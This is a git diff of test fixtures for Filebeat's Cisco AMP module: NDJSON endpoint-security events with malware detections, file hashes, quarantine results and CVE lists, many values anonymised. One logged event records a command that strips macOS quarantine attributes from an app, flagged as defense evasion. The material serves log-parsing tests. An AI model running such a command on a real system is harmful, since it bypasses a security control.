found"},"computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.1.184","mac":"av:6b:fc:23:a1:29"},{"ip":"192.168.2.1","mac":"00:50:24:c0:01:01"},{"ip":"192.168.12.1","mac":"55:50:22:c0:12:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/11ac0afb-123456-45b5-84bc-543asbvdcasd","trajectory":"https://api.eu.amp.cisco.com/v1/computers/11ac0afb-123456-45b5-84bc-543asbvdcasd/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/0c246ccd-45123214-4d30-900f-12454354354423"}},"file":{"disposition":"Unknown","file_name":"setup.exe","file_path":"\\\\?\\C:\\Users\\elastic\\AppData\\Local\\Temp\\somezip.zip\\Visual_install\\setup.exe","identity":{"sha256":"a8b424b65d1550c87b531f7a14523bvdf982d8f869976f99fa1cef5342ausdy"}}}} -{"data":{"id":123578990,"timestamp":1605079734,"timestamp_nanoseconds":24000000,"date":"2020-11-11T07:28:54+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","start_timestamp":1605079733,"start_date":"2020-11-11T07:28:53+00:00","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.2.2","mac":"ac:aa:22:00:11:55"},{"ip":"192.168.228.70","mac":"f2:18:12:75:55:12"},{"ip":"192.12.52.12","mac":"65:29:8f:97:04:ea"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/1224532-sadf-dsf2134-bb5b-1235213","trajectory":"https://api.eu.amp.cisco.com/v1/computers/1224532-sadf-dsf2134-bb5b-123512/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/64535234-123dfsg-3245sdf-123"}},"cloud_ioc":{"description":"A process was seen whitelisting/restoring a file from quarantine. This is an uncommon task, and warrants further investigation as OS X is not known to quarantine files unnecessarily. This is also known to be part of the Mitre Att&ck Framework, technique T1144.","short_description":"OSX.QuarantineExclusion.ioc"},"file":{"disposition":"Clean","file_name":"sudo","file_path":"file:///usr/bin/sudo","identity":{"sha256":"123dfsdg234b7ba3d5ff63033129fa1b96975ad124sdgasdf1sdf"},"parent":{"disposition":"Clean","identity":{"sha256":"sadgf234643sdaffee7a9bd309a4123sdfag9523e8b152123sdfgdfsf2"}}},"command_line":{"arguments":"sudo /usr/bin/xattr -r -d com.apple.quarantine uTorrent.app"},"tactics":["TA0005"],"techniques":["T1144"]}} -{"data":{"id":123578990,"timestamp":1605079353,"timestamp_nanoseconds":170000000,"date":"2020-11-11T07:22:33+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.1.2","mac":"11:50:f1:12:23:23"},{"ip":"192.168.1.1","mac":"0a:12:27:52:00:12"},{"ip":"192.168.2.1","mac":"00:c1:12:c0:22:12"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/1234d-sadf-234-sdf-123","trajectory":"https://api.eu.amp.cisco.com/v1/computers/1234d-sadf-234-sdf-123/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/123543-sdgfdf234-sadf13-123"}},"file":{"disposition":"Unknown","file_name":"locale.exe","file_path":"\\\\?\\C:\\tools\\msys64\\usr\\bin\\locale.exe","identity":{"sha256":"asdf123sdfaac359fcb0d488ca489e2d55645ce34709fdafb78e336405cb","sha1":"asdfsadf1234140de34a45db0124e5c518bf612","md5":"asdgsdrf2346523279149285c8ddc8"}}}} -{"data":{"id":123578990,"timestamp":1605079316,"timestamp_nanoseconds":611596000,"date":"2020-11-11T07:21:56+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.2.1","mac":"f2:18:12:23:c5:54"},{"ip":"","mac":"82:2a:e3:12:58:02"},{"ip":"","mac":"vg:de:12:00:v1:22"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/634532-sdf-234-dsfga-123","trajectory":"https://api.eu.amp.cisco.com/v1/computers/634532-sdf-234-dsfga-123/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/64535234-123dfsg-3245sdf-123"}},"file":{"disposition":"Clean","file_name":"sudo","file_path":"/usr/bin/sudo","identity":{"sha256":"123asfdsdfa125ff63033129fa1b96975ad4d6da2e2a4cf6393"}}}} -{"data":{"id":123578990,"timestamp":1605030133,"timestamp_nanoseconds":0,"date":"2020-11-10T17:42:13+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Low","start_timestamp":1605030131,"start_date":"2020-11-10T17:42:11+00:00","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.2.42","mac":"av:17:1b:fe:v2:f0"},{"ip":"192.168.1.1","mac":"00:42:v2:3c:12:12"},{"ip":"192.168.6.1","mac":"1f:12:27:00:00:52"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/124324df-2123-523-41231","trajectory":"https://api.eu.amp.cisco.com/v1/computers/124324df123-523-41231/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/1235643-sdf123123"}},"file":{"disposition":"Clean","file_name":"AcroRd32.exe","identity":{"sha256":"5643234fsadgef6644b8b69e999c454c045a2d8ec476c4b6165df4ed03"},"parent":{"disposition":"Clean","identity":{"sha256":"agdfsdaf987sdf036070cca561bff5337c472313c0cb4ad"}}},"vulnerabilities":[{"name":"Adobe Acrobat Reader","version":"15.007.20033","cve":"CVE-2014-0566","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0566"},{"cve":"CVE-2015-3095","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3095"},{"cve":"CVE-2015-4435","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4435"},{"cve":"CVE-2015-4438","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4438"},{"cve":"CVE-2015-4441","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4441"},{"cve":"CVE-2015-4445","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4445"},{"cve":"CVE-2015-4446","score":"7.5","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4446"},{"cve":"CVE-2015-4447","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4447"},{"cve":"CVE-2015-4448","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4448"},{"cve":"CVE-2015-4451","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4451"},{"cve":"CVE-2015-4452","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4452"},{"cve":"CVE-2015-5085","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5085"},{"cve":"CVE-2015-5086","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5086"},{"cve":"CVE-2015-5087","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5087"},{"cve":"CVE-2015-5090","score":"7.2","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5090"},{"cve":"CVE-2015-5091","score":"7.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5091"},{"cve":"CVE-2015-5093","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5093"},{"cve":"CVE-2015-5094","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5094"},{"cve":"CVE-2015-5095","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5095"},{"cve":"CVE-2015-5096","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5096"},{"cve":"CVE-2015-5097","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5097"},{"cve":"CVE-2015-5098","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5098"},{"cve":"CVE-2015-5099","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5099"},{"cve":"CVE-2015-5100","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5100"},{"cve":"CVE-2015-5101","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5101"},{"cve":"CVE-2015-5102","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5102"},{"cve":"CVE-2015-5103","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5103"},{"cve":"CVE-2015-5104","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5104"},{"cve":"CVE-2015-5105","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5105"},{"cve":"CVE-2015-5106","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5106"},{"cve":"CVE-2015-5108","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5108"},{"cve":"CVE-2015-5109","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5109"},{"cve":"CVE-2015-5110","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5110"},{"cve":"CVE-2015-5111","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5111"},{"cve":"CVE-2015-5113","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5113"},{"cve":"CVE-2015-5114","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5114"},{"cve":"CVE-2015-5115","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5115"},{"cve":"CVE-2017-11211","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11211"},{"cve":"CVE-2017-11212","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11212"},{"cve":"CVE-2017-11214","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11214"},{"cve":"CVE-2017-11216","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11216"},{"cve":"CVE-2017-11218","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11218"},{"cve":"CVE-2017-11219","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11219"},{"cve":"CVE-2017-11220","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11220"},{"cve":"CVE-2017-11221","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11221"},{"cve":"CVE-2017-11222","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11222"},{"cve":"CVE-2017-11223","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11223"},{"cve":"CVE-2017-11224","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11224"},{"cve":"CVE-2017-11226","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11226"},{"cve":"CVE-2017-11227","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11227"},{"cve":"CVE-2017-11228","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11228"},{"cve":"CVE-2017-11229","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11229"},{"cve":"CVE-2017-11234","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11234"},{"cve":"CVE-2017-11235","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11235"},{"cve":"CVE-2017-11237","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11237"},{"cve":"CVE-2017-11241","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11241"},{"cve":"CVE-2017-11251","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11251"},{"cve":"CVE-2017-11254","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11254"},{"cve":"CVE-2017-11256","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11256"},{"cve":"CVE-2017-11257","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11257"},{"cve":"CVE-2017-11259","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11259"},{"cve":"CVE-2017-11260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11260"},{"cve":"CVE-2017-11261","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11261"},{"cve":"CVE-2017-11262","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11262"},{"cve":"CVE-2017-11263","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11263"},{"cve":"CVE-2017-11267","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11267"},{"cve":"CVE-2017-11269","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11269"},{"cve":"CVE-2017-11270","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11270"},{"cve":"CVE-2017-11271","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11271"}]}} diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log-expected.json deleted file mode 100644 index 52efeb8e97ba..000000000000 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log-expected.json +++ /dev/null @@ -1,87 +0,0 @@ -[ - { - "@timestamp": "2020-11-11T09:51:38.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "1235-1234sdgf-654sdf-7562345", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "192.168.196.22", - "mac": "aa:d9:ac:af:1d:ad" - }, - { - "ip": "192.168.120.1", - "mac": "12:24:56:c2:00:01" - }, - { - "ip": "192.168.160.1", - "mac": "12:50:56:c2:53:08" - } - ], - "cisco.amp.connector_guid": "1235-1234sdgf-654sdf-7562345", - "cisco.amp.detection": "W32.Trojan.22gp.1201", - "cisco.amp.detection_id": "12365423467", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Unknown", - "cisco.amp.group_guids": [ - "6542345gdfs-234-sdf2-34-6345243" - ], - "cisco.amp.related.mac": [ - "aa:d9:ac:af:1d:ad", - "12:24:56:c2:00:01", - "12:50:56:c2:53:08" - ], - "cisco.amp.timestamp_nanoseconds": 153000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 123578990, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "9a8557b98ed1469272fa0ace91d63477", - "file.hash.sha1": "d0c4192b65e36553fvfd2b83f3113f6ae8390baa", - "file.hash.sha256": "e678899d7ea9702184067b56655f91b69f8a0bdc9df65613762252c055c2cdvc", - "file.name": "HYXiN3hY.exe.part", - "file.path": "\\\\?\\C:\\Users\\elastic\\AppData\\Local\\Temp\\HYXiN3hY.exe.part", - "fileset.name": "amp", - "host.hostname": "testhost", - "host.name": "testhost", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@domain", - "input.type": "log", - "log.offset": 0, - "process.hash.md5": "e50ab86d5409d4d0ad386b27ea7f78fb", - "process.hash.sha1": "d539afb0991e823c7cdf824b610a5a5d7655a2da", - "process.hash.sha256": "a7ca534327103ec5fac749f5ab8b7a1fe81209aa580a52df656284ef6215f0ab", - "process.name": "firefox.exe", - "process.pid": 88, - "related.hash": [ - "e678899d7ea9702184067b56655f91b69f8a0bdc9df65613762252c055c2cdvc", - "9a8557b98ed1469272fa0ace91d63477", - "d0c4192b65e36553fvfd2b83f3113f6ae8390baa" - ], - "related.hosts": [ - "testhost" - ], - "related.ip": [ - "8.8.8.8", - "192.168.196.22", - "192.168.120.1", - "192.168.160.1" - ], - "related.user": [ - "user@domain" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - } -] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log new file mode 100644 index 000000000000..211de5d2bc95 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log @@ -0,0 +1,49 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837","sha1":"128aa78059540cf0cdae2a3cea30cd80e00f2046","md5":"c877b67a5733c59d0d8ed8d519df0c91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533243623469744000,"timestamp":1610619329,"timestamp_nanoseconds":596000000,"date":"2021-01-14T10:15:29+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT657.tmp","file_path":"\\\\?\\C:\\BIT657.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"SqGGuYXyy.exe","file_path":"\\\\?\\C:\\SqGGuYXyy.exe","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT4BBF.tmp","file_path":"\\\\?\\C:\\BIT4BBF.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739875754000,"timestamp":1610618750,"timestamp_nanoseconds":875739000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud 